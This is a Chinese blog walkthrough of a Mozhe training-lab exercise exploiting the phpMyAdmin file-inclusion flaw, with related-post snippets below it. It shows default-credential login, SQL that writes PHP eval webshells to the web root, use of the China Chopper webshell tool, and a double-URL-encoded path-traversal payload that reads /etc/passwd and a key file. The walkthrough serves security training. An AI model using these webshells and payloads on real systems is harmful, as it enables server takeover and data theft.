07#墨者靶场-phpMyAdmin后台文件包含分析溯源

最新推荐文章于 2023-12-12 00:52:29 发布
最新推荐文章于 2023-12-12 00:52:29 发布
阅读量1.4k 收藏 6
点赞数
分类专栏: 靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/103200713
版权

                                               墨者学习

                                              By/shy014

地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe

1.在墨者学院找到该靶场并点击启动靶场

2.点击访问,进入靶场环境,并尝试默认口令(root,root),登陆成功

3.查看MySQL是否限制导入导出,是否能使用into outfile直接写入一句话木马

show global variables like '%secure%';

当secure_file_priv为NULL时,表示限制mysql不允许导入导出。所以爆出错误

要想使得该语句导出成功,则需要在mysql文件夹下修改my.ini 文件,

在[mysqld]内加入secure_file_priv ="" 即可

4.查看MySQL日志状态

show variables like '%general%';

5.利用日志文件写入一句话木马

开启general_log :set global general_log='on';


设置日志写入文件:

SET global general_log_file='/var/www/html/shy.php';

执行命令,自动写入日志:SELECT '<?php @eval($_POST[shy]);?>';

6.访问日志文件,由于linux权限限制,禁止访问,不能执行,个体设立了失败。

7.尝试直接通过into outfile写入一句话木马,访问执行成功

select '<?php eval($_POST[shy]); ?>' into outfile '/var/www/html/shy.php';

8.使用菜刀连接,下载存在文件包含的PHP文件index.php进行分析

9.对index.php进行分析,发现第55到63行存在问题

if (! empty($_REQUEST['target'])

判断非空

&& is_string($_REQUEST['target'])

判断是否是字符串

&& ! preg_match('/^index/', $_REQUEST['target'])

判断不能以index开头

&& ! in_array($_REQUEST['target'], $target_blacklist)

判断是否在$target_blacklist数组中

&& Core::checkPageValidity($_REQUEST['target'])

判断是否满足checkPageValidity()函数

) {

include $_REQUEST['target'];

包含通过判断的target

    exit;

}

10.找到 $target_blacklist在第50行,只要 target 参数不是 import.php 或 export.php 就可以

11.从菜刀中找到core.php下载并进行分析

 

12.找到checkPageValidity函数,在第443行, 发现checkPageValidity() 函数中有三个地方返回true,这三个地方都是判断变量$_page的值是否在白名单数组$whitelist

     白名单数组$whitelist的值如下:

checkPageValidity() 函数及分析如下:

public static function checkPageValidity(&$page, array $whitelist = [])

    {

        if (empty($whitelist)) {

            $whitelist = self::$goto_whitelist;

        }

        if (! isset($page) || !is_string($page)) {

            return false;

        }

 

        if (in_array($page, $whitelist)) {

            return true;

这里是将未经过任何处理的参数$page的值判断是否在$whitelist白名单中

        }

        $_page = mb_substr(

            $page,

            0,

            mb_strpos($page . '?', '?')

        );

        if (in_array($_page, $whitelist)) {

            return true;

        }

mb_substr() 函数返回字符串的一部分

mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置

所以这里就可以通过?/../../../../../../etc/passwd绕过白名单限制

        $_page = urldecode($page);

        $_page = mb_substr(

            $_page,

            0,

            mb_strpos($_page . '?', '?')

        );

        if (in_array($_page, $whitelist)) {

            return true;

        }

这里多了一个urldecode()函数,可以利用双重url编码绕过

可以把?双重编码为%253f进行绕过白名单限制

%253/../../../../../../etc/passwd

 

        return false;

}

根据以上分析可以构建payload进行包含

Payload: db_sql.php%253f%20/../../../../../../要包含的文件

db_sql.php%253f%20是被当作目录进行上跳

尝试利用payload包含passwd文件,读取成功,

http://219.153.49.228:49788/index.php?target=db_sql.php%253f%20/../../../../../../etc/passwd

14.包含根目录下key.txt文件,获取key值

http://219.153.49.228:49788/index.php?target=db_sql.php%253f%20/../../../../../../key.txt

15.提交key值,完成靶机

shy014
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 4929
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 803
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1319
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
墨者靶场练习——phpMyAdmin后台文件包含分析溯源
weixin_63082823的博客
12-12 552
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 489
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
phpMyAdmin后台文件包含分析溯源(CVE-2018-12613)--墨者学院
小白鸽
08-03 756
01 背景介绍 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 02 影响版本 phpMyAdmin 4.8.0和4.8.1 03 利用方式 1.写phpinfo文件,利用文件包含,查看绝对路径, select '<?php phpinfo()?>' 2.写小马 select '<?ph
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1298
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1475
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
CVE-2018-12613 PhpMyadmin后台文件包含分析
大方子
07-28 1173
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞. 描述: 一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。 该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg ['AllowArbitraryServer'] = true:攻击者...
墨者学院_phpMyAdmin后台文件包含分析溯源
cc_de_csdn的博客
08-22 2516
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响 前台可以使用弱口令直接登录...
[zkaq靶场]文件包含--(phpMyAdmin-4.8.1 )
wwxxee
05-10 313
文件包含 本地文件包含:LFI 远程文件包含:RFI(需要开启配置选项:allow_url_include=On) 靶场(phpMyAdmin-4.8.1 ) 本地测试 审计 全局搜索include,发现一些可疑之处: 具体代码是这一块: 需要执行到include需要满足这个if条件。 我们可以来分析一下这个条件: (! empty($_REQUEST['target'])//条件1 is_string($_REQUEST['target'])//条件2 ! preg_match('/^index/
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值